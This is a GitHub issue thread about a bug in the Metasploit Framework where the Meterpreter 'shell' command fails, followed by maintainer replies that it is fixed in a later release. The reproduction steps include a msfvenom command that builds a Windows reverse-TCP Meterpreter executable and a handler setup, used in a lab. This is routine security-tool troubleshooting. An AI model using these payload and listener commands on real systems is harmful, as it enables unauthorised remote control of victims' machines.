### ISSUE TITLE
Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments

### ISSUE THREAD

**Issue by yeyuexishuxiao** [rapid7/metasploit-framework#19569]
[-] Failed to spawn shell with thread impersonation. Retrying without it.
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments
![图片](https://github.com/user-attachments/assets/68c59dbe-b068-4a39-88d9-206c42926537)

![图片](https://github.com/user-attachments/assets/2492ea4a-597d-4ffd-b41a-78523a98b006)

**Comment by MoeLogical** [comment]
Steps to reproduce

2 VMs Lab Environment
VirtualBox 7.1.0

1. Attacker VM
 Virtualization: oracle
Operating System: Ubuntu 24.04.1 LTS              
          Kernel: Linux 6.8.0-47-generic
    Architecture: x86-64
   Hardware Model: VirtualBox

Distributor ID:	Ubuntu
Description:	Ubuntu 24.04.1 LTS
Release:	24.04 desktop

2.  Victim VM
OS Name:                   Microsoft Windows 10 Enterprise Evaluation
OS Version:                10.0.19045 N/A Build 19045
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
System Model:              VirtualBox
System Type:               x64-based PC

Recreate Event
Create the exe for windows using
msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.0.0.4 LPORT =4444 -f exe -o notreallymalware.exe 

Then in Metasploit
msfconfig
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST enp0s3
LHOST => enp0s3
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit
msf shell

Additional information section has the error output.


Expected Behavior
It should allow me to run a shell on the victim system and execute commands.


Current Behavior
Failed to spawn shell.


Additional Information

Metasploit Documentation: https://docs.metasploit.com/

msf6 > set loglevel 3
loglevel => 3
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST enp0s3
LHOST => enp0s3
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.4:4444 
[*] Sending stage (176198 bytes) to 0.0.0.5
[*] Meterpreter session 1 opened (0.0.0.4:4444 -> 0.0.0.5:52577) at 2024-10-21 04:30:06 +0100

meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments

Debug Report

Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:

[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=exploit/multi/handler

[multi/handler]
PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=enp0s3
LPORT=4444
WORKSPACE=
VERBOSE=false
WfsDelay=2
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ExitOnSession=true
ListenerTimeout=0

Database Configuration
The database contains the following information:

Session Type: Connected to msf. Connection type: postgresql.

| ID | Hosts | Vulnerabilities | Notes | Services |
|-:|-:|-:|-:|-:|
| 1 **(Current)** | 2 | 2 | 3 | 0 |
| **Total (1)** | **2** | **2** | **3** | **0**

Framework Configuration
The features are configured as follows:

| name | enabled |
|-:|-:|
| wrapped_tables | true |
| fully_interactive_shells | false |
| manager_commands | false |
| datastore_fallbacks | true |
| metasploit_payload_warnings | true |
| defer_module_loads | false |
| smb_session_type | true |
| postgresql_session_type | true |
| mysql_session_type | true |
| mssql_session_type | true |
| ldap_session_type | false |
| show_successful_logins | false |
| dns | true |
| hierarchical_search_table | true |

History
The following commands were executed during the session before the issue occurred:

83     set loglevel 3
84     use exploit/multi/handler
85     set PAYLOAD windows/meterpreter/reverse_tcp
86     set LHOST enp0s3
87     set LPORT 4444
88     exploit

Framework Errors
The following framework errors occurred before the issue occurred:

[10/21/2024 04:27:51] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[10/21/2024 04:27:56] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[10/21/2024 04:27:58] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[10/21/2024 04:30:02] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[10/21/2024 04:30:03] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[10/21/2024 04:30:11] [e(0)] meterpreter: Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments

Version/Install
The versions and install method of your Metasploit setup:

Framework: 6.4.32-dev-
Ruby: ruby 3.2.5 (2024-07-26 revision 31d0f1a2e7) [x86_64-linux]
OpenSSL: OpenSSL 1.1.1t  7 Feb 2023
Install Root: /opt/metasploit-framework/embedded/framework
Session Type: Connected to msf. Connection type: postgresql.
Install Method: Omnibus Installer

**Comment by cgranleese-r7** [comment]
Thanks for raising this issue.

This should be fixed in our next release, which is scheduled for later today 👍

**Comment by NatsPwns** [comment]
Is this issue resolved? 
The error persists for me across vm's:
![image](https://github.com/user-attachments/assets/bb35aba9-fe4a-4868-bbee-9f1cd404997e)

**Comment by adfoster-r7** [comment]
@NatsPwns What is the output of the `version` command? You may have an older version still, it should be fixed in version 6.4.33

**Comment by phibersoft** [comment]
Hello @adfoster-r7 , I was experiencing same issue then saw your comment and upgraded my metasploit-framework to latest version.

Now the old error became this one,
![Screenshot 2024-11-10 234924](https://github.com/user-attachments/assets/be242c1a-a898-4da4-bc23-3a9808081d45)

Do you know what can be the reasons for "Command shell is not valid"?

**Comment by adfoster-r7** [comment]
@philophobia78 Please raise a new issue and ensure you follow the error report so that we can replicate the issue or view the error log
